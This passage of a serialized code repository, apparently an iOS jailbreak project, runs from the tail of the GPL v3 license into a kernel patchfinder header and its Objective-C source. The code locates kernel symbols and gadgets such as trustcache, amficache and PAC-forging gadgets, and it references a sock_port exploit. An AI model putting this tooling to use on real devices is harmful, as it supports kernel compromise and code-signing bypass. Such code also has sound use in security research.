under\nthis License (including any patent licenses granted under the third\nparagraph of section 11).\n\n However, if you cease all violation of this License, then your\nlicense from a particular copyright holder is reinstated (a)\nprovisionally, unless and until the copyright holder explicitly and\nfinally terminates your license, and (b) permanently, if the copyright\nholder fails to notify you of the violation by some reasonable means\nprior to 60 days after the cessation.\n\n Moreover, your license from a particular copyright holder is\nreinstated permanently if the copyright holder notifies you of the\nviolation by some reasonable means, this is the first time you have\nreceived notice of violation of this License (for any work) from that\ncopyright holder, and you cure the violation prior to 30 days after\nyour receipt of the notice.\n\n Termination of your rights under this section does not terminate the\nlicenses of parties who have received copies or rights from you under\nthis License. If your rights have been terminated and not permanently\nreinstated, you do not qualify to receive new licenses for the same\nmaterial under section 10.\n\n 9. Acceptance Not Required for Having Copies.\n\n You are not required to accept this License in order to receive or\nrun a copy of the Program. Ancillary propagation of a covered work\noccurring solely as a consequence of using peer-to-peer transmission\nto receive a copy likewise does not require acceptance. However,\nnothing other than this License grants you permission to propagate or\nmodify any covered work. These actions infringe copyright if you do\nnot accept this License. Therefore, by modifying or propagating a\ncovered work, you indicate your acceptance of this License to do so.\n\n 10. Automatic Licensing of Downstream Recipients.\n\n Each time you convey a covered work, the recipient automatically\nreceives a license from the original licensors, to run, modify and\npropagate that work, subject to this License. You are not responsible\nfor enforcing compliance by third parties with this License.\n\n An \"entity transaction\" is a transaction transferring control of an\norganization, or substantially all assets of one, or subdividing an\norganization, or merging organizations. If propagation of a covered\nwork results from an entity transaction, each party to that\ntransaction who receives a copy of the work also receives whatever\nlicenses to the work the party's predecessor in interest had or could\ngive under the previous paragraph, plus a right to possession of the\nCorresponding Source of the work from the predecessor in interest, if\nthe predecessor has it or can get it with reasonable efforts.\n\n You may not impose any further restrictions on the exercise of the\nrights granted or affirmed under this License. For example, you may\nnot impose a license fee, royalty, or other charge for exercise of\nrights granted under this License, and you may not initiate litigation\n(including a cross-claim or counterclaim in a lawsuit) alleging that\nany patent claim is infringed by making, using, selling, offering for\nsale, or importing the Program or any portion of it.\n\n 11. Patents.\n\n A \"contributor\" is a copyright holder who authorizes use under this\nLicense of the Program or a work on which the Program is based. The\nwork thus licensed is called the contributor's \"contributor version\".\n\n A contributor's \"essential patent claims\" are all patent claims\nowned or controlled by the contributor, whether already acquired or\nhereafter acquired, that would be infringed by some manner, permitted\nby this License, of making, using, or selling its contributor version,\nbut do not include claims that would be infringed only as a\nconsequence of further modification of the contributor version. For\npurposes of this definition, \"control\" includes the right to grant\npatent sublicenses in a manner consistent with the requirements of\nthis License.\n\n Each contributor grants you a non-exclusive, worldwide, royalty-free\npatent license under the contributor's essential patent claims, to\nmake, use, sell, offer for sale, import and otherwise run, modify and\npropagate the contents of its contributor version.\n\n In the following three paragraphs, a \"patent license\" is any express\nagreement or commitment, however denominated, not to enforce a patent\n(such as an express permission to practice a patent or covenant not to\nsue for patent infringement). To \"grant\" such a patent license to a\nparty means to make such an agreement or commitment not to enforce a\npatent against the party.\n\n If you convey a covered work, knowingly relying on a patent license,\nand the Corresponding Source of the work is not available for anyone\nto copy, free of charge and under the terms of this License, through a\npublicly available network server or other readily accessible means,\nthen you must either (1) cause the Corresponding Source to be so\navailable, or (2) arrange to deprive yourself of the benefit of the\npatent license for this particular work, or (3) arrange, in a manner\nconsistent with the requirements of this License, to extend the patent\nlicense to downstream recipients. \"Knowingly relying\" means you have\nactual knowledge that, but for the patent license, your conveying the\ncovered work in a country, or your recipient's use of the covered work\nin a country, would infringe one or more identifiable patents in that\ncountry that you have reason to believe are valid.\n\n If, pursuant to or in connection with a single transaction or\narrangement, you convey, or propagate by procuring conveyance of, a\ncovered work, and grant a patent license to some of the parties\nreceiving the covered work authorizing them to use, propagate, modify\nor convey a specific copy of the covered work, then the patent license\nyou grant is automatically extended to all recipients of the covered\nwork and works based on it.\n\n A patent license is \"discriminatory\" if it does not include within\nthe scope of its coverage, prohibits the exercise of, or is\nconditioned on the non-exercise of one or more of the rights that are\nspecifically granted under this License. You may not convey a covered\nwork if you are a party to an arrangement with a third party that is\nin the business of distributing software, under which you make payment\nto the third party based on the extent of your activity of conveying\nthe work, and under which the third party grants, to any of the\nparties who would receive the covered work from you, a discriminatory\npatent license (a) in connection with copies of the covered work\nconveyed by you (or copies made from those copies), or (b) primarily\nfor and in connection with specific products or compilations that\ncontain the covered work, unless you entered into that arrangement,\nor that patent license was granted, prior to 28 March 2007.\n\n Nothing in this License shall be construed as excluding or limiting\nany implied license or other defenses to infringement that may\notherwise be available to you under applicable patent law.\n\n 12. No Surrender of Others' Freedom.\n\n If conditions are imposed on you (whether by court order, agreement or\notherwise) that contradict the conditions of this License, they do not\nexcuse you from the conditions of this License. If you cannot convey a\ncovered work so as to satisfy simultaneously your obligations under this\nLicense and any other pertinent obligations, then as a consequence you may\nnot convey it at all. For example, if you agree to terms that obligate you\nto collect a royalty for further conveying from those to whom you convey\nthe Program, the only way you could satisfy both those terms and this\nLicense would be to refrain entirely from conveying the Program.\n\n 13. Use with the GNU Affero General Public License.\n\n Notwithstanding any other provision of this License, you have\npermission to link or combine any covered work with a work licensed\nunder version 3 of the GNU Affero General Public License into a single\ncombined work, and to convey the resulting work. The terms of this\nLicense will continue to apply to the part which is the covered work,\nbut the special requirements of the GNU Affero General Public License,\nsection 13, concerning interaction through a network will apply to the\ncombination as such.\n\n 14. Revised Versions of this License.\n\n The Free Software Foundation may publish revised and/or new versions of\nthe GNU General Public License from time to time. Such new versions will\nbe similar in spirit to the present version, but may differ in detail to\naddress new problems or concerns.\n\n Each version is given a distinguishing version number. If the\nProgram specifies that a certain numbered version of the GNU General\nPublic License \"or any later version\" applies to it, you have the\noption of following the terms and conditions either of that numbered\nversion or of any later version published by the Free Software\nFoundation. If the Program does not specify a version number of the\nGNU General Public License, you may choose any version ever published\nby the Free Software Foundation.\n\n If the Program specifies that a proxy can decide which future\nversions of the GNU General Public License can be used, that proxy's\npublic statement of acceptance of a version permanently authorizes you\nto choose that version for the Program.\n\n Later license versions may give you additional or different\npermissions. However, no additional obligations are imposed on any\nauthor or copyright holder as a result of your choosing to follow a\nlater version.\n\n 15. Disclaimer of Warranty.\n\n THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY\nAPPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT\nHOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM \"AS IS\" WITHOUT WARRANTY\nOF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,\nTHE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\nPURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM\nIS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF\nALL NECESSARY SERVICING, REPAIR OR CORRECTION.\n\n 16. Limitation of Liability.\n\n IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING\nWILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS\nTHE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY\nGENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE\nUSE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF\nDATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD\nPARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),\nEVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGES.\n\n 17. Interpretation of Sections 15 and 16.\n\n If the disclaimer of warranty and limitation of liability provided\nabove cannot be given local legal effect according to their terms,\nreviewing courts shall apply local law that most closely approximates\nan absolute waiver of all civil liability in connection with the\nProgram, unless a warranty or assumption of liability accompanies a\ncopy of the Program in return for a fee.\n\n END OF TERMS AND CONDITIONS\n\n How to Apply These Terms to Your New Programs\n\n If you develop a new program, and you want it to be of the greatest\npossible use to the public, the best way to achieve this is to make it\nfree software which everyone can redistribute and change under these terms.\n\n To do so, attach the following notices to the program. It is safest\nto attach them to the start of each source file to most effectively\nstate the exclusion of warranty; and each file should have at least\nthe \"copyright\" line and a pointer to where the full notice is found.\n\n \n Copyright (C) \n\n This program is free software: you can redistribute it and/or modify\n it under the terms of the GNU General Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n This program is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n GNU General Public License for more details.\n\n You should have received a copy of the GNU General Public License\n along with this program. If not, see .\n\nAlso add information on how to contact you by electronic and paper mail.\n\n If the program does terminal interaction, make it output a short\nnotice like this when it starts in an interactive mode:\n\n Copyright (C) \n This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.\n This is free software, and you are welcome to redistribute it\n under certain conditions; type `show c' for details.\n\nThe hypothetical commands `show w' and `show c' should show the appropriate\nparts of the General Public License. Of course, your program's commands\nmight be different; for a GUI interface, you would use an \"about box\".\n\n You should also get your employer (if you work as a programmer) or school,\nif any, to sign a \"copyright disclaimer\" for the program, if necessary.\nFor more information on this, and how to apply and follow the GNU GPL, see\n.\n\n The GNU General Public License does not permit incorporating your program\ninto proprietary programs. If your program is a subroutine library, you\nmay consider it more useful to permit linking proprietary applications with\nthe library. If this is what you want to do, use the GNU Lesser General\nPublic License instead of this License. But first, please read\n.\n" }, { "path": "PatchFinder/patchfinder64.h", "content": "#ifndef patchfinder_h\n#define patchfinder_h\n#import \n#import \n#import \n#import \ntypedef unsigned long long addr_t;\nint initializePatchFinderWithBase(addr_t base, const char *filename);\nvoid terminatePatchFinder(void);\n\n// Fun part\nuint64_t Find_allproc(void);\nuint64_t Find_add_x0_x0_0x40_ret(void);\nuint64_t Find_copyout(void);\nuint64_t Find_bzero(void);\nuint64_t Find_bcopy(void);\nuint64_t Find_rootvnode(void);\nuint64_t Find_trustcache(void);\nuint64_t Find_amficache(void);\nuint64_t Find_pmap_load_trust_cache_ppl(void);\nuint64_t Find_OSBoolean_True(void);\nuint64_t Find_OSBoolean_False(void);\nuint64_t Find_zone_map_ref(void);\nuint64_t Find_osunserializexml(void);\nuint64_t Find_smalloc(void);\nuint64_t Find_sbops(void);\nuint64_t Find_bootargs(void);\nuint64_t Find_vfs_context_current(void);\nuint64_t Find_vnode_lookup(void);\nuint64_t Find_vnode_put(void);\nuint64_t Find_cs_gen_count(void);\nuint64_t Find_cs_validate_csblob(void);\nuint64_t Find_kalloc_canblock(void);\nuint64_t Find_cs_blob_allocate_site(void);\nuint64_t Find_kfree(void);\nuint64_t Find_cs_find_md(void);\nuint64_t Find_kernel_memory_allocate(void);\nuint64_t Find_kernel_map(void);\n\n// PAC\nuint64_t Find_l2tp_domain_module_start(void);\nuint64_t Find_l2tp_domain_module_stop(void);\nuint64_t Find_l2tp_domain_inited(void);\nuint64_t Find_sysctl_net_ppp_l2tp(void);\nuint64_t Find_sysctl_unregister_oid(void);\nuint64_t Find_mov_x0_x4__br_x5(void);\nuint64_t Find_mov_x9_x0__br_x1(void);\nuint64_t Find_mov_x10_x3__br_x6(void);\nuint64_t Find_kernel_forge_pacia_gadget(void);\nuint64_t Find_kernel_forge_pacda_gadget(void);\nuint64_t Find_IOUserClient_vtable(void);\nuint64_t Find_IORegistryEntry__getRegistryEntryID(void);\n\n#endif\n" }, { "path": "PatchFinder/patchfinder64.m", "content": "\n//\n// patchfinder64.c\n// extra_recipe\n//\n// Created by xerub on 06/06/2017.\n// Copyright © 2017 xerub. All rights reserved.\n//\n\n#import \n#import \n#import \n#import \n#import \n#include \"../Kernel Utilities/kernel_utils.h\"\n#include \"../Exploits/sock_port/exploit.h\"\n\ntypedef unsigned long long addr_t;\n#define IS64(image) (*(uint8_t *)(image) & 1)\n#define MACHO(p) ((*(unsigned int *)(p) & ~1) == 0xfeedface)\n\n/* generic stuff *************************************************************/\n\n#define UCHAR_MAX 255\n\nstatic unsigned char *\nBoyermoore_horspool_memmem(const unsigned char* haystack, size_t hlen,\n const unsigned char* needle, size_t nlen)\n{\n size_t last, scan = 0;\n size_t bad_char_skip[UCHAR_MAX + 1]; /* Officially called:\n * bad character shift */\n \n /* Sanity checks on the parameters */\n if (nlen <= 0 || !haystack || !needle)\n return NULL;\n \n /* ---- Preprocess ---- */\n /* Initialize the table to default value */\n /* When a character is encountered that does not occur\n * in the needle, we can safely skip ahead for the whole\n * length of the needle.\n */\n for (scan = 0; scan <= UCHAR_MAX; scan = scan + 1)\n bad_char_skip[scan] = nlen;\n \n /* C arrays have the first byte at [0], therefore:\n * [nlen - 1] is the last byte of the array. */\n last = nlen - 1;\n \n /* Then populate it with the analysis of the needle */\n for (scan = 0; scan < last; scan = scan + 1)\n bad_char_skip[needle[scan]] = last - scan;\n \n /* ---- Do the matching ---- */\n \n /* Search the haystack, while the needle can still be within it. */\n while (hlen >= nlen)\n {\n /* scan from the end of the needle */\n for (scan = last; haystack[scan] == needle[scan]; scan = scan - 1)\n if (scan == 0) /* If the first byte matches, we've found it. */\n return (void *)haystack;\n \n /* otherwise, we need to skip some bytes and start again.\n Note that here we are getting the skip value based on the last byte\n of needle, no matter where we didn't match. So if needle is: \"abcd\"\n then we are skipping based on 'd' and that value will be 4, and\n for \"abcdd\" we again skip on 'd' but the value will be only 1.\n The alternative of pretending that the mismatched character was\n the last character is slower in the normal case (E.g. finding\n \"abcd\" in \"...azcd...\" gives 4 by using 'd' but only\n 4-2==2 using 'z'. */\n hlen -= bad_char_skip[haystack[last]];\n haystack += bad_char_skip[haystack[last]];\n }\n \n return NULL;\n}\n\n/* disassembler **************************************************************/\n\nstatic int HighestSetBit(int N, uint32_t imm)\n{\n int i;\n for (i = N - 1; i >= 0; i--) {\n if (imm & (1 << i)) {\n return i;\n }\n }\n return -1;\n}\n\nstatic uint64_t ZeroExtendOnes(unsigned M, unsigned N) // zero extend M ones to N width\n{\n (void)N;\n return ((uint64_t)1 << M) - 1;\n}\n\nstatic uint64_t RORZeroExtendOnes(unsigned M, unsigned N, unsigned R)\n{\n uint64_t val = ZeroExtendOnes(M, N);\n if (R == 0) {\n return val;\n }\n return ((val >> R) & (((uint64_t)1 << (N - R)) - 1)) | ((val & (((uint64_t)1 << R) - 1)) << (N - R));\n}\n\nstatic uint64_t Replicate(uint64_t val, unsigned bits)\n{\n uint64_t ret = val;\n unsigned shift;\n for (shift = bits; shift < 64; shift += bits) { // XXX actually, it is either 32 or 64\n ret |= (val << shift);\n }\n return ret;\n}\n\nstatic int DecodeBitMasks(unsigned immN, unsigned imms, unsigned immr, int immediate, uint64_t *newval)\n{\n unsigned levels, S, R, esize;\n int len = HighestSetBit(7, (immN << 6) | (~imms & 0x3F));\n if (len < 1) {\n return -1;\n }\n levels = ZeroExtendOnes(len, 6);\n if (immediate && (imms & levels) == levels) {\n return -1;\n }\n S = imms & levels;\n R = immr & levels;\n esize = 1 << len;\n *newval = Replicate(RORZeroExtendOnes(S + 1, esize, R), esize);\n return 0;\n}\n\nstatic int DecodeMov(uint32_t opcode, uint64_t total, int first, uint64_t *newval)\n{\n unsigned o = (opcode >> 29) & 3;\n unsigned k = (opcode >> 23) & 0x3F;\n unsigned rn, rd;\n uint64_t i;\n \n if (k == 0x24 && o == 1) { // MOV (bitmask imm) <=> ORR (immediate)\n unsigned s = (opcode >> 31) & 1;\n unsigned N = (opcode >> 22) & 1;\n if (s == 0 && N != 0) {\n return -1;\n }\n rn = (opcode >> 5) & 0x1F;\n if (rn == 31) {\n unsigned imms = (opcode >> 10) & 0x3F;\n unsigned immr = (opcode >> 16) & 0x3F;\n return DecodeBitMasks(N, imms, immr, 1, newval);\n }\n } else if (k == 0x25) { // MOVN/MOVZ/MOVK\n unsigned s = (opcode >> 31) & 1;\n unsigned h = (opcode >> 21) & 3;\n if (s == 0 && h > 1) {\n return -1;\n }\n i = (opcode >> 5) & 0xFFFF;\n h *= 16;\n i <<= h;\n if (o == 0) { // MOVN\n *newval = ~i;\n return 0;\n } else if (o == 2) { // MOVZ\n *newval = i;\n return 0;\n } else if (o == 3 && !first) { // MOVK\n *newval = (total & ~((uint64_t)0xFFFF << h)) | i;\n return 0;\n }\n } else if ((k | 1) == 0x23 && !first) { // ADD (immediate)\n unsigned h = (opcode >> 22) & 3;\n if (h > 1) {\n return -1;\n }\n rd = opcode & 0x1F;\n rn = (opcode >> 5) & 0x1F;\n if (rd != rn) {\n return -1;\n }\n i = (opcode >> 10) & 0xFFF;\n h *= 12;\n i <<= h;\n if (o & 2) { // SUB\n *newval = total - i;\n return 0;\n } else { // ADD\n *newval = total + i;\n return 0;\n }\n }\n \n return -1;\n}\n\n/* patchfinder ***************************************************************/\n\nstatic addr_t\nStep64(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)\n{\n addr_t end = start + length;\n while (start < end) {\n uint32_t x = *(uint32_t *)(buf + start);\n if ((x & mask) == what) {\n return start;\n }\n start += 4;\n }\n return 0;\n}\n\n// str8 = Step64_back(Kernel, ref, ref - bof, INSN_STR8);\nstatic addr_t\nStep64_back(const uint8_t *buf, addr_t start, size_t length, uint32_t what, uint32_t mask)\n{\n addr_t end = start - length;\n while (start >= end) {\n uint32_t x = *(uint32_t *)(buf + start);\n if ((x & mask) == what) {\n return start;\n }\n start -= 4;\n }\n return 0;\n}\n\n// Finds start of function\nstatic addr_t\nBOF64(const uint8_t *buf, addr_t start, addr_t where)\n{\n extern addr_t PPLText_size;\n if (PPLText_size) {\n for (; where >= start; where -= 4) {\n uint32_t op = *(uint32_t *)(buf + where);\n if (op == 0xD503237F) {\n return where;\n }\n }\n return 0;\n }\n \n for (; where >= start; where -= 4) {\n uint32_t op = *(uint32_t *)(buf + where);\n \n if ((op & 0xFFC003FF) == 0x910003FD) {\n unsigned delta = (op >> 10) & 0xFFF;\n //printf(\"%x: ADD X29, SP, #0x%x\\n\", where, delta);\n if ((delta & 0xF) == 0) {\n addr_t prev = where - ((delta >> 4) + 1) * 4;\n uint32_t au = *(uint32_t *)(buf + prev);\n if ((au & 0xFFC003E0) == 0xA98003E0) {\n //printf(\"%x: STP x, y, [SP,#-imm]!\\n\", prev);\n if (*(uint32_t *)(buf + prev - 4) == 0xd503237f) return prev - 4;\n return prev;\n }\n // try something else\n while (where > start) {\n where -= 4;\n au = *(uint32_t *)(buf + where);\n // SUB SP, SP, #imm\n if ((au & 0xFFC003FF) == 0xD10003FF && ((au >> 10) & 0xFFF) == delta + 0x10) {\n if (*(uint32_t *)(buf + where - 4) == 0xd503237f) return where - 4;\n return where;\n }\n // STP x, y, [SP,#imm]\n if ((au & 0xFFC003E0) != 0xA90003E0) {\n where += 4;\n break;\n }\n }\n }\n }\n }\n return 0;\n}\n\nstatic addr_t\nFollow_call64(const uint8_t *buf, addr_t call)\n{\n long long w;\n w = *(uint32_t *)(buf + call) & 0x3FFFFFF;\n w <<= 64 - 26;\n w >>= 64 - 26 - 2;\n return call + w;\n}\n\nstatic addr_t\nXREF64(const uint8_t *buf, addr_t start, addr_t end, addr_t what)\n{\n addr_t i;\n uint64_t value[32];\n \n memset(value, 0, sizeof(value));\n \n end &= ~3;\n for (i = start & ~3; i < end; i += 4) {\n uint32_t op = *(uint32_t *)(buf + i);\n unsigned reg = op & 0x1F;\n if ((op & 0x9F000000) == 0x90000000) {\n signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);\n //printf(\"%llx: ADRP X%d, 0x%llx\\n\", i, reg, ((long long)adr << 1) + (i & ~0xFFF));\n value[reg] = ((long long)adr << 1) + (i & ~0xFFF);\n /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {\n unsigned rd = op & 0x1F;\n unsigned rm = (op >> 16) & 0x1F;\n //printf(\"%llx: MOV X%d, X%d\\n\", i, rd, rm);\n value[rd] = value[rm];*/\n } else if ((op & 0xFF000000) == 0x91000000) {\n unsigned rn = (op >> 5) & 0x1F;\n unsigned shift = (op >> 22) & 3;\n unsigned imm = (op >> 10) & 0xFFF;\n if (shift == 1) {\n imm <<= 12;\n } else {\n //assert(shift == 0);\n if (shift > 1) continue;\n }\n //printf(\"%llx: ADD X%d, X%d, 0x%x\\n\", i, reg, rn, imm);\n value[reg] = value[rn] + imm;\n } else if ((op & 0xF9C00000) == 0xF9400000) {\n unsigned rn = (op >> 5) & 0x1F;\n unsigned imm = ((op >> 10) & 0xFFF) << 3;\n //printf(\"%llx: LDR X%d, [X%d, 0x%x]\\n\", i, reg, rn, imm);\n if (!imm) continue; // XXX not counted as true xref\n value[reg] = value[rn] + imm; // XXX address, not actual value\n /*} else if ((op & 0xF9C00000) == 0xF9000000) {\n unsigned rn = (op >> 5) & 0x1F;\n unsigned imm = ((op >> 10) & 0xFFF) << 3;\n //printf(\"%llx: STR X%d, [X%d, 0x%x]\\n\", i, reg, rn, imm);\n if (!imm) continue; // XXX not counted as true xref\n value[rn] = value[rn] + imm; // XXX address, not actual value*/\n } else if ((op & 0x9F000000) == 0x10000000) {\n signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);\n //printf(\"%llx: ADR X%d, 0x%llx\\n\", i, reg, ((long long)adr >> 11) + i);\n value[reg] = ((long long)adr >> 11) + i;\n } else if ((op & 0xFF000000) == 0x58000000) {\n unsigned adr = (op & 0xFFFFE0) >> 3;\n //printf(\"%llx: LDR X%d, =0x%llx\\n\", i, reg, adr + i);\n value[reg] = adr + i; // XXX address, not actual value\n }\n else if ((op & 0xFC000000) == 0x94000000) {\n if (Follow_call64(buf, i) == what) {\n return i;\n }\n }\n else if ((op & 0xFC000000) == 0x14000000) {\n if (Follow_call64(buf, i) == what) {\n return i;\n }\n }\n else if ((op & 0x7F000000) == 0x37000000) {\n uint64_t addr = i + 4 * ((op & 0x7FFE0) >> 5);\n if (addr == what) {\n return i;\n }\n }\n if (value[reg] == what) {\n return i;\n }\n }\n return 0;\n}\n\nstatic addr_t\nCalc64(const uint8_t *buf, addr_t start, addr_t end, int which)\n{\n addr_t i;\n uint64_t value[32];\n \n memset(value, 0, sizeof(value));\n \n end &= ~3;\n for (i = start & ~3; i < end; i += 4) {\n uint32_t op = *(uint32_t *)(buf + i);\n unsigned reg = op & 0x1F;\n if ((op & 0x9F000000) == 0x90000000) {\n signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);\n //printf(\"%llx: ADRP X%d, 0x%llx\\n\", i, reg, ((long long)adr << 1) + (i & ~0xFFF));\n value[reg] = ((long long)adr << 1) + (i & ~0xFFF);\n /*} else if ((op & 0xFFE0FFE0) == 0xAA0003E0) {\n unsigned rd = op & 0x1F;\n unsigned rm = (op >> 16) & 0x1F;\n //printf(\"%llx: MOV X%d, X%d\\n\", i, rd, rm);\n value[rd] = value[rm];*/\n } else if ((op & 0xFF000000) == 0x91000000) {\n unsigned rn = (op >> 5) & 0x1F;\n unsigned shift = (op >> 22) & 3;\n unsigned imm = (op >> 10) & 0xFFF;\n if (shift == 1) {\n imm <<= 12;\n } else {\n //assert(shift == 0);\n if (shift > 1) continue;\n }\n //printf(\"%llx: ADD X%d, X%d, 0x%x\\n\", i, reg, rn, imm);\n value[reg] = value[rn] + imm;\n } else if ((op & 0xFF000000) == 0xd2000000) {\n unsigned val = (op & 0x1fffe0) >> 5; // idk if this is really correct but works for our purpose\n value[reg] = val;\n }\n else if ((op & 0xF9C00000) == 0xF9400000) {\n unsigned rn = (op >> 5) & 0x1F;\n unsigned imm = ((op >> 10) & 0xFFF) << 3;\n //printf(\"%llx: LDR X%d, [X%d, 0x%x]\\n\", i, reg, rn, imm);\n if (!imm) continue; // XXX not counted as true xref\n value[reg] = value[rn] + imm; // XXX address, not actual value\n } else if ((op & 0xF9C00000) == 0xb9400000) { // 32bit\n unsigned rn = (op >> 5) & 0x1F;\n unsigned imm = ((op >> 10) & 0xFFF) << 2;\n if (!imm) continue; // XXX not counted as true xref\n value[reg] = value[rn] + imm; // XXX address, not actual value\n } else if ((op & 0xF9C00000) == 0xF9000000) {\n unsigned rn = (op >> 5) & 0x1F;\n unsigned imm = ((op >> 10) & 0xFFF) << 3;\n //printf(\"%llx: STR X%d, [X%d, 0x%x]\\n\", i, reg, rn, imm);\n if (!imm) continue; // XXX not counted as true xref\n value[rn] = value[rn] + imm; // XXX address, not actual value\n } else if ((op & 0x9F000000) == 0x10000000) {\n signed adr = ((op & 0x60000000) >> 18) | ((op & 0xFFFFE0) << 8);\n //printf(\"%llx: ADR X%d, 0x%llx\\n\", i, reg, ((long long)adr >> 11) + i);\n value[reg] = ((long long)adr >> 11) + i;\n } else if ((op & 0xFF000000) == 0x58000000) {\n unsigned adr = (op & 0xFFFFE0) >> 3;\n //printf(\"%llx: LDR X%d, =0x%llx\\n\", i, reg, adr + i);\n value[reg] = adr + i; // XXX address, not actual value\n }\n }\n return value[which];\n}\n\nstatic addr_t\nCalc64mov(const uint8_t *buf, addr_t start, addr_t end, int which)\n{\n addr_t i;\n uint64_t value[32];\n \n memset(value, 0, sizeof(value));\n \n end &= ~3;\n for (i = start & ~3; i < end; i += 4) {\n uint32_t op = *(uint32_t *)(buf + i);\n unsigned reg = op & 0x1F;\n uint64_t newval;\n int rv = DecodeMov(op, value[reg], 0, &newval);\n if (rv == 0) {\n if (((op >> 31) & 1) == 0) {\n newval &= 0xFFFFFFFF;\n }\n value[reg] = newval;\n }\n }\n return value[which];\n}\n\nstatic addr_t\nFind_call64(const uint8_t *buf, addr_t start, size_t length)\n{\n return Step64(buf, start, length, 0x94000000, 0xFC000000);\n}\n\nstatic addr_t\nFollow_cbz(const uint8_t *buf, addr_t cbz)\n{\n return cbz + ((*(int *)(buf + cbz) & 0x3FFFFE0) << 10 >> 13);\n}\n\n/* kernel iOS10 **************************************************************/\n\n#import \n#import \n#import \n#import \n#import \n\nstatic uint8_t *Kernel = NULL;\nstatic size_t Kernel_size = 0;\n\nstatic addr_t XNUCore_Base = 0;\nstatic addr_t XNUCore_Size = 0;\nstatic addr_t Prelink_Base = 0;\nstatic addr_t Prelink_Size = 0;\nstatic addr_t CString_base = 0;\nstatic addr_t CString_size = 0;\nstatic addr_t PString_base = 0;\nstatic addr_t PString_size = 0;\nstatic addr_t OSLog_base = 0;\nstatic addr_t OSLog_size = 0;\nstatic addr_t Data_base = 0;\nstatic addr_t Data_size = 0;\nstatic addr_t Data_const_base = 0;\nstatic addr_t Data_const_size = 0;\naddr_t PPLText_base = 0;\naddr_t PPLText_size = 0;\n\nstatic addr_t KernDumpBase = -1;\nstatic addr_t Kernel_entry = 0;\nstatic void *Kernel_mh = 0;\nstatic addr_t Kernel_delta = 0;\n\nstatic uint32_t arch_off = 0;\n\nint\ninitializePatchFinderWithBase(addr_t base, const char *filename)\n{\n size_t rv;\n uint8_t buf[0x4000];\n unsigned i, j;\n const struct mach_header *hdr = (struct mach_header *)buf;\n const uint8_t *q;\n addr_t min = -1;\n addr_t max = 0;\n int is64 = 0;\n \n int fd = open(filename, O_RDONLY);\n if (fd < 0) {\n return -1;\n }\n \n uint32_t magic;\n read(fd, &magic, 4);\n lseek(fd, 0, SEEK_SET);\n if (magic == 0xbebafeca) {\n struct fat_header fat;\n lseek(fd, sizeof(fat), SEEK_SET);\n struct fat_arch_64 arch;\n read(fd, &arch, sizeof(arch));\n arch_off = ntohl(arch.offset);\n lseek(fd, arch_off, SEEK_SET); // kerneldec gives a FAT binary for some reason\n }\n \n rv = read(fd, buf, sizeof(buf));\n if (rv != sizeof(buf)) {\n close(fd);\n return -1;\n }\n \n if (!MACHO(buf)) {\n close(fd);\n return -1;\n }\n \n if (IS64(buf)) {\n is64 = 4;\n }\n \n q = buf + sizeof(struct mach_header) + is64;\n for (i = 0; i < hdr->ncmds; i++) {\n const struct load_command *cmd = (struct load_command *)q;\n if (cmd->cmd == LC_SEGMENT_64) {\n const struct segment_command_64 *seg = (struct segment_command_64 *)q;\n if (min > seg->vmaddr) {\n min = seg->vmaddr;\n }\n if (max < seg->vmaddr + seg->vmsize) {\n max = seg->vmaddr + seg->vmsize;\n }\n if (!strcmp(seg->segname, \"__TEXT_EXEC\")) {\n XNUCore_Base = seg->vmaddr;\n XNUCore_Size = seg->filesize;\n }\n else if (!strcmp(seg->segname, \"__PPLTEXT\")) {\n PPLText_base = seg->vmaddr;\n PPLText_size = seg->filesize;\n }\n else if (!strcmp(seg->segname, \"__PLK_TEXT_EXEC\")) {\n Prelink_Base = seg->vmaddr;\n Prelink_Size = seg->filesize;\n }\n else if (!strcmp(seg->segname, \"__DATA_CONST\")) {\n const struct section_64 *sec = (struct section_64 *)(seg + 1);\n for (j = 0; j < seg->nsects; j++) {\n if (!strcmp(sec[j].sectname, \"__const\")) {\n Data_const_base = sec[j].addr;\n Data_const_size = sec[j].size;\n }\n }\n }\n else if (!strcmp(seg->segname, \"__DATA\")) {\n const struct section_64 *sec = (struct section_64 *)(seg + 1);\n for (j = 0; j < seg->nsects; j++) {\n if (!strcmp(sec[j].sectname, \"__data\")) {\n Data_base = sec[j].addr;\n Data_size = sec[j].size;\n }\n }\n }\n else if (!strcmp(seg->segname, \"__TEXT\")) {\n const struct section_64 *sec = (struct section_64 *)(seg + 1);\n for (j = 0; j < seg->nsects; j++) {\n if (!strcmp(sec[j].sectname, \"__cstring\")) {\n CString_base = sec[j].addr;\n CString_size = sec[j].size;\n }\n if (!strcmp(sec[j].sectname, \"__os_log\")) {\n OSLog_base = sec[j].addr;\n OSLog_size 